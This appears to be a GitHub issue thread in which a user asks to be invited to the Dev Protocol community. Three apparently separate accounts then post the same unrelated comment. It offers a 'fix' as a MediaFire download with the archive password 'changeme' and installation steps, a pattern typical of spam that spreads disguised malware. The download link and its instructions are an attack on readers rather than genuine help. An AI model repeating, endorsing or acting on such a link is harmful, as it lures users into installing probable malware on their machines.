### ISSUE TITLE
Please invite me to the community

### ISSUE THREAD

**Issue by Diwa07** [dev-protocol/community#879]
### Name

Diwakar khatiwada

### Discord Username (if applicable)

Diwa

### Additional Context

I discovered the Dev Protocol Community through online forums and social media. What I appreciate most about this community is its strong emphasis on collaboration and support for developers of all skill levels. I want to join because I see it as a great opportunity to grow, share knowledge, and contribute to innovative projects within a welcoming environment

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
